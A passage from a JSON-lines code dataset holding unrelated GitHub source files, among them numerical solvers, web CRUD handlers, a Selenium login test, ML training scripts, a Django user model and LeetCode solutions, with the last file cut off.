RunnerFeatClsLoc(EpochBasedRunnerFeatClsLoc):\n \"\"\"Deprecated name of EpochBasedRunner.\"\"\"\n\n def __init__(self, *args, **kwargs):\n warnings.warn(\n 'Runner was deprecated, please use EpochBasedRunner instead')\n super().__init__(*args, **kwargs)\n# ","repo_name":"NVlabs/DICOD","sub_path":"mmcv_dev/runner/epoch_based_runner_feat_cls_loc.py","file_name":"epoch_based_runner_feat_cls_loc.py","file_ext":"py","file_size_in_byte":10623,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"43"} +{"seq_id":"13517697486","text":"def jacobi(first_eq, second_eq, third_eq, n=100):\r\n \"\"\"\r\n Iterative method for solving linear equations\r\n https://en.wikipedia.org/wiki/Jacobi_method\r\n \"\"\"\r\n\r\n a11 = first_eq[0]\r\n a12 = first_eq[1]\r\n a13 = first_eq[2]\r\n b1 = first_eq[3]\r\n a21 = second_eq[0]\r\n a22 = second_eq[1]\r\n a23 = second_eq[2]\r\n b2 = second_eq[3]\r\n a31 = third_eq[0]\r\n a32 = third_eq[1]\r\n a33 = third_eq[2]\r\n b3 = third_eq[3]\r\n\r\n # Initial values\r\n x= 0\r\n y = 0\r\n z = 0\r\n xs = []\r\n ys = []\r\n zs = []\r\n ns = []\r\n\r\n for i in range(n):\r\n oldx = x\r\n oldy = y\r\n oldz = z\r\n x = (1/a11) * (b1 - a12*oldy - a13*oldz)\r\n y = (1/a22) * (b2 - a21*oldx - a23*oldz)\r\n z = (1/a33) * (b3 - a31*oldx - a32*oldy)\r\n xs.append(x)\r\n ys.append(y)\r\n zs.append(z)\r\n ns.append(i)\r\n\r\n return {'n': ns, 'x': xs, 'y': ys, 'z': zs}\r\n","repo_name":"adhamsalama/iterative_methods","sub_path":"jacobi.py","file_name":"jacobi.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2474131135","text":"#import lazynlp\nimport analytics\nfrom create import filter_files\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"path\", help=\"path containing links\")\nparser.add_argument(\"--recursive\", help=\"indicates that path contains folders instead of files\", action=\"store_true\")\nparser.add_argument(\"--delete\", help=\"delete duplicate files\", action=\"store_true\")\nargs = parser.parse_args()\n\nif args.recursive:\n\tpath = os.path.abspath(args.path)\n\tpaths = [ os.path.join(path,name) for name in os.listdir(path) if os.path.isdir(os.path.join(path, name)) ]\n\tprint( \"paths found: \" + str(len(paths)) )\nelse:\n\tpaths = [os.path.abspath(args.path)]\n\nfiles = []\n\nfor dir in paths:\n\tfile_list = os.listdir(dir)\n\tprint (f'Files in {dir}: {len(file_list)}')\n\tif len(file_list) == 0:\n\t\tcontinue\n\tfor file in file_list:\n\t\tfiles.append(os.path.join(dir,file))\n\nprint ( 'files found: ' + str(len(files)) )\t\n\nfilter_files(files, threshold=0.5, gran='word', n=8, capacity=100000000, error_rate=1e-7, header=0, interval=1000000)\n\nif args.delete:\n\tdups = open('dupped_files.txt','r')\n\tcount = 0\n\tfor file in dups:\n\t\tos.remove(file)\n\t\tcount += 1\n\tprint (f'Removed {dups} duplicate files.')\n","repo_name":"cweyandt/MIDS_w251_lazynlp_threaded","sub_path":"remove_dups.py","file_name":"remove_dups.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24793209201","text":"from fastapi import HTTPException\nfrom database import *\nimport secrets\nfrom models.client_credential import Client_credential\nfrom models.company import Company\nfrom models.company_account import Company_account\nfrom models.role import Role\n\ndef create_company(companies, current_user):\n if current_user.roleId != 1:\n raise HTTPException(status_code=403, detail=\"Cannot create company\")\n\n result = Company.insert_many(companies).execute()\n for company in companies:\n app_id = secrets.token_hex(16)\n app_key = secrets.token_urlsafe(16)\n Client_credential.insert(app_key=app_key, app_id=app_id).execute()\n current_company = Company.get_or_none(Company.uuid == company['uuid'])\n Company_account.insert(\n companyId=current_company.id, appId=app_id).execute()\n print(app_id, app_key, current_company.id)\n\n\n return result\n\n\ndef get_companies(current_user):\n\n data = {}\n companies = []\n roles_result = []\n\n\n\n if current_user.roleId == 1:\n companies_result = list(Company.select())\n roles_result = list(Role.select())\n companies = companies_result\n data = {\n \"companies\": companies_result,\n \"roles\": roles_result\n }\n else:\n company_accounts = list(\n Company_account\n .select(Company_account.companyId.alias('id'))\n .where(current_user.id == Company_account.userId)\n )\n\n for company_account in company_accounts:\n result = list(\n Company\n .select()\n .where(Company.id == company_account.id)\n )\n roles_result = list(Role\n .select()\n .where(current_user.roleId <= Role.id))\n\n companies.append(result[0])\n\n data = {\n \"companies\": companies,\n \"roles\": roles_result\n }\n\n\n return data\n","repo_name":"franlopz/backoffice-backend","sub_path":"crud/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13412956953","text":"# [20301] 반전 요세푸스\n\"\"\"\n[1,2,3,4,5,6,7] \nK = 3번째 마다 지우기\n1,2을 7뒤로 append해주고, 맨 앞에 있는 3를 popleft해주고 print하는 방식\n\n지운 횟수가 M번이 되면 방향을 바꿔주기\n\"\"\"\nfrom collections import deque\n\nN, K, M = map(int, input().split()) # 7 3 4\n\"\"\"\nN명이 원을 이루며 앉아있다\nM명마다 지우기\nK명이 되면 사람을 제거하는 순서 반대로 돌리기\n\"\"\"\n\npeople = deque(range(1, N+1)) # 1부터 N까지의 숫자를 deque에 넣음\ndirection = 1 # 처음에는 오른쪽 방향으로 진행\ncount = 0 # 제거한 사람의 수\n\nwhile people:\n if direction == 1: # 오른쪽 방향으로 진행\n for _ in range(K-1):\n people.append(people.popleft()) # K번째 사람을 찾음\n print(people.popleft()) # K번째 사람을 제거하고 번호를 출력\n else: # 왼쪽 방향으로 진행\n for _ in range(K-1):\n people.appendleft(people.pop()) # K번째 사람을 찾음\n print(people.pop()) # K번째 사람을 제거하고 번호를 출력\n\n count += 1\n if count % M == 0: # M명의 사람을 제거했으면\n direction *= -1 # 방향을 바꿈\n","repo_name":"SeungAh-Hong/algorithm-study-hyundai","sub_path":"Baekjoon/초급자_큐/반전요세푸스_박혜원.py","file_name":"반전요세푸스_박혜원.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"70387530050","text":"import numpy as np\nfrom scipy.io import wavfile\nimport matplotlib.pyplot as plt\nimport os\nfrom WavFormatTansform import wav_f32_to_int16\nimport MyPack as mp\n\n\nroot = 'audio_files'\nname_in = 'Bass.wav'\nname_out = 'Bass2.wav'\ndir_input = os.path.join(root, name_in)\ndir_output = os.path.join(root, name_out)\n\nwav_f32_to_int16(dir_input, dir_output)\nsampling_rate, data = wavfile.read(dir_output)\n\nif len(data.shape) == 1:\n channel = 1\n data = data.reshape(-1, 1)\nelse:\n channel = data.shape[1]\nlength = data.shape[0] / sampling_rate\nprint('sampling_rate is:', sampling_rate)\nprint('number of channels:', channel)\nprint('Length of the file:', length)\ntime = np.linspace(0, length, data.shape[0])\n\nframes = mp.signal_framing(data, sampling_rate)\n\nmp.energy_analysis(frames)\nplt.show()\n\n'''mp.show_fft(data[:, 1], sampling_rate, min_hz=0, max_hz=22050)\nmp.show_fft(frames[0, :, 1], sampling_rate, min_hz=0, max_hz=22050)\nmp.show_fft(frames[1, :, 1], sampling_rate, min_hz=0, max_hz=22050)\nmp.show_fft(frames[2, :, 1], sampling_rate, min_hz=0, max_hz=22050)\nmp.show_fft(frames[3, :, 1], sampling_rate, min_hz=0, max_hz=22050)'''\n\n\n\n\n\n'''N = np.int(sampling_rate/100)\nmask = list(np.arange(N))\ntest_data = data[:, 0]\ntest_data = test_data[mask]\nmp.show_fft(test_data, sampling_rate, min_hz=0, max_hz=22050)\n\n\nw = mp.window('Hamming', N)\nresult = test_data * w\nmp.show_fft(result, sampling_rate, min_hz=0, max_hz=22050)\n\nplt.show()'''\n\n\n\n\n","repo_name":"MrRhine98/Audio_processing_notes","sub_path":"AudioLoader.py","file_name":"AudioLoader.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39755637494","text":"\"\"\" 用户登录 Test\n\n用户登录测试\n\"\"\"\n\n__author__ = 'Richard'\n__version__ = '2021-07-10'\n\nimport allure\nimport pytest\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium import webdriver\nfrom time import sleep\n\nfrom pages.user_login_page import UserLoginPage\n\n\nclass TestUserLogin(object):\n login_data = [\n ('mail@lichao.xin', '123456', '首页')\n ]\n\n def setup_class(self):\n options = webdriver.ChromeOptions()\n # 忽略https安全拦截\n options.add_argument('--ignore-certificate-errors')\n\n # 无头模式\n # options.add_argument('--headless')\n # options.add_argument('--disable-gpu')\n\n # 初始化 webdriver\n self.driver = webdriver.Chrome(options=options)\n\n self.loginPage = UserLoginPage(self.driver)\n self.loginPage.goto_login_page()\n\n def teardown_class(self):\n self.driver.quit()\n\n # 测试用户登录\n @allure.title(\"测试用户登录,测试数据是:{username},{pwd},{expected}\")\n @pytest.mark.parametrize('username, pwd, expected', login_data)\n def test_user_login(self, username, pwd, expected):\n\n # 输入用户名\n self.loginPage.input_username(username)\n # 输入密码\n self.loginPage.input_pwd(pwd)\n # 点击登录\n self.loginPage.click_login_btn()\n\n sleep(3)\n # 验证\n if username != '':\n # 等待提示框\n WebDriverWait(self.driver, 5).until(EC.title_is(expected))\n\n # 取反\n # WebDriverWait(self.driver, 5).until_not(EC.title_is(expected))\n\n sleep(3)\n # 验证\n assert self.driver.title == expected\n else:\n # 等待提示框\n WebDriverWait(self.driver, 5).until(EC.alert_is_present())\n alert = self.driver.switch_to.alert\n assert alert.text == expected\n alert.accept()\n\n\nif __name__ == '__main__':\n pytest.main(['-sv', 'test_user_login.py'])\n","repo_name":"xinlc/auto-test-template","sub_path":"tests/test_user_login.py","file_name":"test_user_login.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73508816449","text":"import tensorflow as tf, sys\n\nimage_path = sys.argv[1]\n\n# setup\nlabel_file = 'retrained_labels.txt'\ngraph_file = 'retrained_graph.pb'\n\n# Read in image\nimage_data = tf.gfile.FastGFile(image_path, 'rb').read()\n\nlabel_lines = [line.rstrip() for line in tf.gfile.GFile(label_file)]\n\n# open retrained graph file and parse the model\nwith tf.gfile.FastGFile(graph_file, 'rb') as f:\n\tgraph_def = tf.GraphDef()\n\tgraph_def.ParseFromString(f.read())\n\t_ = tf.import_graph_def(graph_def, name='')\n\n# start a tensorflow session\nwith tf.Session() as sess:\n\n\t# Input image data and get first prediction. Use softmax to get prediction\n\t# maps the final layer into probabilities for each classifier\n\tsoftmax = sess.graph.get_tensor_by_name('final_result:0')\n\n\t# executing softmax tensor function on input image\n\tpredictions = sess.run(softmax, {'DecodeJpeg/contents:0': image_data})\n\n\t# grab label in order of confidence. Reverse sorted array to grab max\n\tin_order = predictions[0].argsort()[-len(predictions[0]):][::-1]\n\tmatch_label = label_lines[in_order[0]]\n\tmatch_score = predictions[0][in_order[0]] * 100\n\tprint ('-----------------------------------------------------')\n\tprint('Welcome stranger...\\n')\n\tprint('Seems like you most resemble {0} from the fellowship.\\n'.format(match_label))\n\tprint(\"Let me see... I predict you're {0} with a {1}% chance!\".format(match_label, round(match_score, 3)))\n\tprint ('-------------------Other Members---------------------')\n\tprint ('details:')\n\tfor node_id in in_order[1:]:\n\t\tclassifier = label_lines[node_id]\n\t\tscore = predictions[0][node_id]\n\t\tprint('%s (score = %.5f)' % (classifier, score))","repo_name":"elllot/HobbitClassifier","sub_path":"image_classifier.py","file_name":"image_classifier.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5631849624","text":"\"\"\"\n2019.11.09 15:00 - 15:09\n偶数求和\n\"\"\"\n\nresult = 0\nindex = 1\n\nwhile index <= 100:\n if index % 2 == 0:\n print(index)\n result += index\n index += 1\n\nprint(\"even sum = %d\" % result)\n","repo_name":"sstian/PythonScripts","sub_path":"Study/even_sum.py","file_name":"even_sum.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35886059043","text":"# 24.py\n\nnum_lines = 100\n\nfile = open('example_file_3', 'wb')\nfor i in range(num_lines):\n # To the bytes function we should pass an iterable with the content to\n # convert. For this reason we pass the integer inside the list\n content = b\"line_\" + bytes([i]) + b\" abcde12\"\n file.write(content)\nfile.close()\n\nfile = open('example_file_3', 'rb')\n# The number 40 indicates the number of bytes that will be read from the file\nprint(file.read(40))\nfile.close()\n","repo_name":"advancedpythonprogramming/chapter_codes","sub_path":"codes_ch10/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"43"} +{"seq_id":"8149401756","text":"from firebase import firebase\nimport datetime\n\nfirebase = firebase.FirebaseApplication('https://ta-kotlin.firebaseio.com/', None)\n\ndef baca_status():\n result = firebase.get('/device_info', None)\n print(result[\"status_pintu\"])\n return result[\"status_pintu\"]\n\ndef baca_register():\n result = firebase.get('/device_info', None)\n print(result[\"status_register\"])\n return [result[\"status_register\"], result[\"pemilik\"]]\ndef pemilik():\n result = firebase.get('/device_info', None)\n print(result[\"pemilik\"])\n return result[\"pemilik\"]\n\ndef ubah_status(status):\n result = firebase.put('/device_info', name=\"status_pintu\", data=status, params={'print': 'pretty'})\n tanggal = datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\")\n result = firebase.put('/device_info', name=\"terakhir_dibuka\", data=tanggal, params={'print': 'pretty'})\n print(result)\n\ndef ubah_status_mode():\n result = firebase.put('/device_info', name=\"status_register\", data=0, params={'print': 'pretty'})\n # result = firebase.put('/device_info', name=\"pemilik\", data=\"\", params={'print': 'pretty'})\n print(result)\n\ndef history():\n tanggal = datetime.datetime.now().strftime(\"%B %d,%Y %I:%M%p \")\n data = {\n \"status\": \"sistem\",\n \"username\": \"sistem\",\n \"tanggaldanwaktu\": tanggal\n }\n result = firebase.post('/History', data)\n #result = firebase.post('/History', name=\"username\",data=\"\", params={'print': 'pretty'})\n print(result)\n\n\nif __name__ == \"__main__\":\n try:\n ubah_status(2)\n while True:\n pemilik()\n except KeyboardInterrupt:\n print(\"[INFO] CLOSED CONNECTION\")\n","repo_name":"riskysetiadis/Smart-Safe-Box","sub_path":"modules/firebase_app.py","file_name":"firebase_app.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1501403041","text":"import os\nimport shutil\nimport datetime\nimport torch\nfrom base.losses.translation_loss import TranslationLoss\nfrom base.metrics.bleu import calc_bleu\nfrom base.schedulers.trans_lr_scheduler import TransLRScheduler\nfrom transformer.model import Transformer\nfrom datasets.wrapper import TextDataWrapper\nfrom utils import load_config\nfrom base.trainer import Trainer\nfrom constants import *\nimport argparse\n\nif __name__ == \"__main__\":\n \"\"\"\n Usage\n python train.py \\\n --config_path ./configs/_base_.yaml \\\n --train_src_path ./data/train.en \\\n --train_trg_path ./data/train.vi \\\n --valid_src_path ./data/val.en \\\n --valid_trg_path ./data/val.vi \\\n --device cuda:0\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config_path\", type=str, default=\"./configs/_base_.yaml\")\n parser.add_argument(\"--train_src_path\", type=str, default=\"./data/train.en\")\n parser.add_argument(\"--train_trg_path\", type=str, default=\"./data/train.vi\")\n parser.add_argument(\"--valid_src_path\", type=str, default=\"./data/val.en\")\n parser.add_argument(\"--valid_trg_path\", type=str, default=\"./data/val.vi\")\n parser.add_argument(\"--load_from\", type=str, default=None, help=\"path to checkpoint to be loaded\")\n parser.add_argument(\"--out_dir\", type=str, default=\"./runs\", help=\"directory to save checkpoints\")\n parser.add_argument(\"--device\", type=str, default=\"cuda\")\n\n args = parser.parse_args()\n\n try: \n if args.out_dir == './runs':\n now = datetime.datetime.now()\n c = now.strftime(\"%Y-%m-%d_%H-%M-%S\")\n args.out_dir = os.path.join(args.out_dir, c)\n \n # copy config to out_dir\n os.makedirs(args.out_dir, exist_ok=True)\n shutil.copy(args.config_path, os.path.join(args.out_dir, 'config.yaml'))\n\n # Load config\n config_dict = load_config(args.config_path)\n print('Config:', config_dict)\n\n # Load dataset\n data_wrapper = TextDataWrapper(src_lang=\"en_core_web_sm\", \n trg_lang=\"vi_core_news_lg\", \n max_len=config_dict['DATA']['MAX_LEN'], \n batch_size=config_dict['DATA']['BATCH_SIZE'],\n device=args.device)\n train_dataloader = data_wrapper.create_dataloader(args.train_src_path, args.train_trg_path, is_train=True, save_field_path=args.out_dir)\n valid_dataloader = data_wrapper.create_dataloader(args.valid_src_path, args.valid_trg_path, is_train=False)\n src_vocab_size = len(data_wrapper.src_field.vocab)\n trg_vocab_size = len(data_wrapper.trg_field.vocab)\n\n # Create model\n model = Transformer(config_path=args.config_path,\n src_vocab_size=src_vocab_size,\n trg_vocab_size=trg_vocab_size)\n if args.load_from is not None:\n model.load_state_dict(torch.load(args.load_from))\n\n # Optimizer and Loss function\n optimizer = TransLRScheduler(\n torch.optim.Adam(model.parameters(), betas=(0.9, 0.98), eps=1e-9),\n init_lr=config_dict['OPTIM']['INIT_LR'],\n d_model=config_dict['MODEL']['ENCODER']['D_MODEL'],\n n_warmup_steps=config_dict['OPTIM']['N_WARMUP_STEPS'],\n )\n criterion = TranslationLoss(\n classes=trg_vocab_size,\n padding_idx=data_wrapper.trg_field.vocab.stoi[PAD],\n smoothing=0.1,\n )\n\n # Run\n trainer = Trainer(\n model=model,\n optimizer=optimizer, \n criterion=criterion,\n num_epochs=config_dict['TRAINER']['N_EPOCHS'],\n metric=calc_bleu,\n src_field=data_wrapper.src_field,\n trg_field=data_wrapper.trg_field,\n max_len=config_dict['DATA']['MAX_LEN'],\n device=args.device,\n )\n\n start = datetime.datetime.now()\n trainer.fit(train_dataloader, valid_dataloader, out_dir=args.out_dir)\n end = datetime.datetime.now()\n print('Training time:', end - start)\n\n except Exception as e:\n raise e","repo_name":"htrvu/Transformer-MT","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"43"} +{"seq_id":"12005842161","text":"class Solution:\n \n \"\"\"\n Problem: https://leetcode.com/contest/weekly-contest-313/problems/maximum-sum-of-an-hourglass/\n Comments:\n - The idea is that you want to perserve information going from one cell to the next\n - Brute force looks like it will pass (150^2 * 7)\n \"\"\"\n \n def maxSum(self, grid: List[List[int]]) -> int:\n n = len(grid)\n m = len(grid[0])\n \n \n mv = 0\n for i in range(1,n-1):\n for j in range(1,m-1):\n total = grid[i][j]\n for k in range(-1,2):\n total += grid[i-1][j-k] + grid[i+1][j+k]\n \n # print(total)\n if total > mv:\n mv = total\n \n return mv","repo_name":"Saaapling/Code-Practice","sub_path":"Medium/Maximum_Sum_of_an_Hourglass/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"41350110744","text":"from unittest import TestCase\nimport warnings\nimport FastaDB\nimport tempfile\n# import hashlib\nimport filecmp\n\n__author__ = 'walzer'\n\n\nclass TestFastaDB(TestCase):\n def test_readSeqs(self):\n fdb = FastaDB.FastaDB()\n\n # case empty\n with warnings.catch_warnings(record=True) as w:\n # all warnings to be triggered.\n warnings.simplefilter(\"always\")\n # trigger warning.\n fdb.read_seqs('')\n # tests\n self.assertFalse(len(w) < 1, 'More warnings then expected')\n self.assertTrue(issubclass(w[-1].category, UserWarning))\n self.assertTrue(\"Could not read file\" in str(w[-1].message))\n w.pop()\n\n # case three.fasta\n fdb = FastaDB.FastaDB()\n fdb.read_seqs('three.fasta')\n self.assertTrue(len(fdb.collection) == 3)\n self.assertTrue(len(fdb.idx) == 3+1)\n self.assertTrue(len(fdb.accs) == 3)\n ts = 0\n for i in fdb.collection.values():\n ts += len(i)\n ts += (len(fdb.collection) - 1)\n self.assertTrue(len(fdb.searchstring) == ts)\n\n #case addition of three.dat\n fdb.read_seqs('three.dat')\n self.assertTrue(len(fdb.collection) == 6)\n self.assertTrue(len(fdb.idx) == 6+1)\n self.assertTrue(len(fdb.accs) == 6)\n ts = 0\n for i in fdb.collection.values():\n ts += len(i)\n ts += (len(fdb.collection) - 1)\n self.assertTrue(len(fdb.searchstring) == ts)\n\n def test_writeSeqs(self):\n fdb = FastaDB.FastaDB()\n fdb.read_seqs('three.fasta')\n with tempfile.NamedTemporaryFile() as temp:\n fdb.write_seqs(temp.name)\n # self.assertTrue(hashlib.sha256(open(temp.name, 'rb').read()).digest() == hashlib.sha256(open(\"three.fasta\", 'rb').read()).digest())\n filecmp.cmp(temp.name, 'three.fasta')\n\n\n def test_exists(self):\n fdb = FastaDB.FastaDB()\n fdb.read_seqs('three.fasta')\n exi = \"TERNEKKQQMGKEYREKIEAEL\"\n ine = \"XXXNEKKQQMGKEYREKIEAEL\"\n self.assertTrue(fdb.exists(exi))\n self.assertFalse(fdb.exists(ine))\n\n def test_search(self):\n fdb = FastaDB.FastaDB()\n fdb.read_seqs('three.fasta')\n eal = \"ELD\"\n self.assertDictEqual(fdb.search(eal), {'ELD': 'sp|P31946|1433B_HUMAN'})\n\n def test_search_all(self):\n fdb = FastaDB.FastaDB()\n fdb.read_seqs('three.fasta')\n eal = \"ELD\"\n self.assertDictEqual(fdb.search_all(eal), {'ELD': 'sp|P31946|1433B_HUMAN,sp|Q04917|1433F_HUMAN,sp|P62258|1433E_HUMAN'})\n","repo_name":"mwalzer/pyBioConveniences","sub_path":"tests/test_fastaDB.py","file_name":"test_fastaDB.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25602299293","text":"from django.db import models\r\nfrom django.contrib.auth.models import BaseUserManager, AbstractBaseUser, PermissionsMixin\r\nfrom phonenumber_field.modelfields import PhoneNumberField\r\nfrom django_countries.fields import CountryField\r\nfrom django.db.models.signals import post_save\r\nfrom django.dispatch import receiver\r\nfrom django.core.validators import FileExtensionValidator\r\n\r\n\r\n# Create your models here.\r\n\r\nclass UserManager(BaseUserManager):\r\n def create_user(self, email, full_name, password=None):\r\n\r\n if not email:\r\n raise ValueError('Email should not be empty')\r\n if not full_name:\r\n raise ValueError('Name should not be empty')\r\n if not password:\r\n raise ValueError('Password should not be empty')\r\n\r\n user = self.model(\r\n email=self.normalize_email(email=email),\r\n full_name=full_name\r\n )\r\n user.set_password(password)\r\n user.save(using=self._db)\r\n return user\r\n\r\n def create_superuser(self, email, full_name, password=None):\r\n user = self.create_user(\r\n email=email, full_name=full_name, password=password)\r\n user.is_superuser = True\r\n user.is_staff = True\r\n user.is_active = True\r\n user.save(using=self._db)\r\n return user\r\n\r\n\r\nclass User(AbstractBaseUser, PermissionsMixin):\r\n email = models.EmailField(\r\n max_length=100, verbose_name='Email', unique=True, blank=False)\r\n full_name = models.CharField(verbose_name='Full Name', max_length=100)\r\n phone_number = PhoneNumberField(verbose_name=\"Phone Number\")\r\n address_one = models.CharField(max_length=255, blank=True)\r\n address_two = models.CharField(max_length=255, blank=True)\r\n city = models.CharField(max_length=255, blank=True)\r\n zipcode = models.CharField(max_length=255, null=True, blank=True)\r\n country = models.CharField(\r\n verbose_name=\"Country\", max_length=50, blank=True)\r\n profile_pic = models.ImageField(\r\n upload_to='users/', default='users/default.jpg')\r\n birth_date = models.DateField(\r\n verbose_name='Birth Date', blank=True, null=True)\r\n date_joined = models.DateTimeField(\r\n verbose_name='Date Joined', auto_now_add=True)\r\n gender_options = (\r\n ('Male', 'Male'),\r\n ('Female', 'Female'),\r\n ('Other', 'Other'),\r\n )\r\n\r\n gender = models.CharField(\r\n verbose_name='Choose Gender', choices=gender_options, max_length=20)\r\n\r\n is_staff = models.BooleanField(verbose_name='Staff Status', default=False, help_text='Designate if the user has '\r\n 'staff status')\r\n is_active = models.BooleanField(verbose_name='Active Status', default=True, help_text='Designate if the user has '\r\n 'active status')\r\n is_superuser = models.BooleanField(verbose_name='Superuser Status', default=False, help_text='Designate if the '\r\n 'user has superuser '\r\n 'status')\r\n is_sales_head = models.BooleanField(verbose_name='Sales Head Status', default=False, help_text='Designate if the '\r\n 'user is sales head ')\r\n is_sales = models.BooleanField(verbose_name='Sales Status', default=False, help_text='Designate if the '\r\n 'user is sales')\r\n is_blogger = models.BooleanField(verbose_name='Blog Admin Status', default=False, help_text='Designate if the '\r\n 'user is Blog Admin ')\r\n is_bcs_head = models.BooleanField(verbose_name='BCS Admin Status', default=False, help_text='Designate if the '\r\n 'user is BCS Admin')\r\n is_pcs_head = models.BooleanField(verbose_name='PCS Admin Status', default=False, help_text='Designate if the '\r\n 'user is PCS Admin')\r\n is_bcs = models.BooleanField(verbose_name='Business Status', default=False, help_text='Designate if the user is '\r\n 'associated with a business')\r\n newsletter = models.BooleanField(verbose_name='Newsletter', default=False, help_text='Receive Email About Update '\r\n 'and Notifications')\r\n\r\n USERNAME_FIELD = 'email'\r\n REQUIRED_FIELDS = ['full_name', ]\r\n\r\n objects = UserManager()\r\n\r\n def __str__(self):\r\n return self.full_name\r\n\r\n def address(self):\r\n return f'{self.address_one} {self.address_two}, {self.city}, {self.zipcode}, {self.country}'\r\n\r\n\r\nadmin_choices = (\r\n ('main_admin', 'Main Admin'),\r\n ('bcs_admin', 'BCS Admin'),\r\n ('pcs_admin', 'PCS Admin'),\r\n ('academy_admin', 'Academy Admin'),\r\n ('blog_admin', 'Blog Admin'),\r\n)\r\n\r\n\r\nclass Permissions(models.Model):\r\n user = models.OneToOneField(\r\n User, on_delete=models.CASCADE, related_name='permission_user')\r\n admin_type = models.CharField(choices=admin_choices, max_length=264)\r\n is_superadmin = models.BooleanField(\r\n default=False, verbose_name='Super Admin')\r\n is_admin = models.BooleanField(default=False, verbose_name='Admin')\r\n is_moderator = models.BooleanField(default=False, verbose_name='Moderator')\r\n is_editor = models.BooleanField(default=False, verbose_name='Editor')\r\n\r\n def __str__(self):\r\n return f'{self.user} - {self.admin_type}'\r\n\r\n\r\nclass Interest(models.Model):\r\n user = models.OneToOneField(\r\n User, on_delete=models.CASCADE, related_name='interest_user')\r\n risk_assessment = models.BooleanField(default=True)\r\n incident_response = models.BooleanField(default=True)\r\n cyber_crime_investigation = models.BooleanField(default=True)\r\n open_source_intelligence = models.BooleanField(default=True)\r\n hack_recovery = models.BooleanField(default=True)\r\n virus_removal = models.BooleanField(default=True)\r\n digital_forensic = models.BooleanField(default=True)\r\n digital_integration = models.BooleanField(default=True)\r\n\r\n def __str__(self):\r\n return f'{self.user}s interest'\r\n\r\n\r\n@receiver(post_save, sender=User)\r\ndef create_interest(sender, instance, created, **kwargs):\r\n if created:\r\n Interest.objects.create(user=instance)\r\n\r\n\r\n@receiver(post_save, sender=User)\r\ndef save_interest(sender, instance, **kwargs):\r\n instance.interest_user.save()\r\n\r\n# @receiver(post_save, sender=User)\r\n# def create_permission(sender, instance, created, **kwargs):\r\n# if created:\r\n# Permissions.objects.create(user=instance)\r\n#\r\n#\r\n# @receiver(post_save, sender=User)\r\n# def save_permission(sender, instance, **kwargs):\r\n# instance.permission_user.save()\r\n","repo_name":"MahmudJewel/tech-foring-task","sub_path":"Account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7299,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"33091614294","text":"print('='*8,'Grupo da Maioridade','='*8)\n\nfrom datetime import date\nmenor = 0\nmaior = 0\nfor p in range(1, 8):\n dt = int(input('Data de nascimento da pessoa número {}: '.format(p)))\n idade = date.today().year - dt\n if idade < 18:\n menor += 1\n else:\n maior += 1\nprint('Existem {} pessoas menores de idade e {} pessoas maiores de idade.'.format(menor, maior))\n","repo_name":"Samuel-Melo890/Python-Desafios","sub_path":"ExerciciosPYTHON/PythonCeV/054.py","file_name":"054.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27341247018","text":"## Solution 1 - Brute force\n## Time: O(N^2)\n## The complete set of N intervals is scanned for every (N) interval chosen.\n\n\n## Solution 2 - Sorting + Linear scan\n## Time: O(N^2)\n\n\n## Solution 3 - Sorting + Binary search\n## Time Complexity: O(NlogN)\n## Space Complexity: O(N)\nclass Solution:\n def binarySearch(self, end, arr, left, right):\n while left < right:\n mid = left + (right - left) // 2\n if arr[mid][1][0] == end:\n return mid\n elif arr[mid][1][0] > end:\n right = mid\n else:\n left = mid + 1\n return left\n\n def findRightInterval(self, intervals):\n '''\n :type intervals: List[List[int]]\n :rtype: List[int]\n '''\n dic = {i:interval for i, interval in enumerate(intervals)}\n dic = sorted(dic.items(), key = lambda x: x[1][0])\n res = [float('-inf')] * len(intervals)\n\n for i, item in enumerate(dic):\n idx, interval = item[0], item[1]\n ans = self.binarySearch(interval[1], dic, i+1, len(dic))\n if ans == len(dic):\n res[idx] = -1\n else:\n res[idx] = dic[ans][0]\n return res\n\n\n## Solution 4 - Two heaps\n## Time Complexity: O(NlogN)\n## Space Complexity: O(N)\nclass Solution:\n 